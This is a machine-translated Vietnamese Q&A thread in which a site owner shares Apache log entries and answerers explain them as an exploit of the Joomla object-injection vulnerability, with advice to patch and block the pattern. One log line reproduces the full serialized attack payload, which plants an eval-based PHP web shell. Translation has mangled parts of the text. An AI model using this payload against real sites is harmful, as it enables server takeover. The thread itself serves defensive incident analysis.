Là nhận dạng tác nhân người dùng được sử dụng cho một số kỹ thuật tấn công kịch bản?

Các mục nhật ký truy cập Apache trên trang web của tôi thường giống như thế này:

207.46.13.174 - - [31/10/2016: 10: 18: 55 +0100] "NHẬN / liên hệ HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (tương thích; bingbot / 2.0; + http: // www .bing.com / bingbot.htmlm) "0.607 MISS 10.10.36.125:104 0.607

vì vậy bạn có thể thấy trường tác nhân người dùng ở đó. Nhưng hôm nay tôi cũng tìm thấy trường tác nhân người dùng được sử dụng như thế này:

62.210.162.42 - - [31/10/2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "vệ sinh"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_RO " ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; cache_name_function "; s: 6:" khẳng định "; s: 5:" cache "; b: 1; s: 11:" cache_group "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,336

Đây có phải là một cuộc tấn công? Mục nhập nhật ký tiếp theo dường như đã lấy thành công tệp (mã 200) sqlconfigbak.phpđược đề cập trong tập lệnh. Mặc dù tôi không thể tìm thấy tệp trong hệ thống tệp:

62.210.162.42 - - [31/10/2016: 11: 24: 20 +0100] "NHẬN //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (tương thích; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

Xin vui lòng những gì đã xảy ra ở đây?

Đây là một cuộc tấn công Joomla 0 ngày. Thông tin tìm thấy ở đây: https://blog.sucuri.net/2015/12/remote-command-execut-vulnerability-in-j Joomla.html

Đây không phải là một bài kiểm tra lỗ hổng mặc dù __test. Đó là một cuộc tấn công.

Hãy chắc chắn rằng bất kỳ cài đặt Joomla nào được cập nhật nhất có thể.

Một tùy chọn khác là chỉ cần sử dụng .htaccess để chặn khai thác này bằng cách tìm một chuỗi chung, "__test" sẽ hoạt động và chuyển hướng đến một nơi khác.

Địa chỉ IP mà bạn đã liên kết không phân giải thành tên máy chủ của Google do đó không phải là Google. Người hoặc bot đang quét trang web của bạn để tìm lỗ hổng. Người đầu tiên đang cố gắng tìm lỗ hổng Joomla.

Những sự kiện này xảy ra thường xuyên trên hầu hết các trang web, Bạn nên đảm bảo rằng bạn đang theo dõi các thực tiễn tốt nhất và làm cứng trang web của bạn, quá trình này kéo dài và bạn sẽ cần tìm và làm theo hướng dẫn trực tuyến.

Ngoài ra với các câu trả lời khác, lưu ý rằng thực tế là cuộc tấn công này rõ ràng có hiệu quả cho thấy bạn đang chạy một phiên bản PHP cũ, không an toàn. Một bản sửa lỗi cho lỗi mà cuộc khai thác tấn công này đã được phát hành vào tháng 9 năm 2015. Chạy quy trình cập nhật của bạn và đảm bảo rằng nó có trong phiên bản PHP mới nhất. Và kiểm tra các chương trình lỗi thời khác cũng phải đối mặt với Internet, vì có vẻ như máy chủ của bạn đã không được cập nhật ít nhất một năm.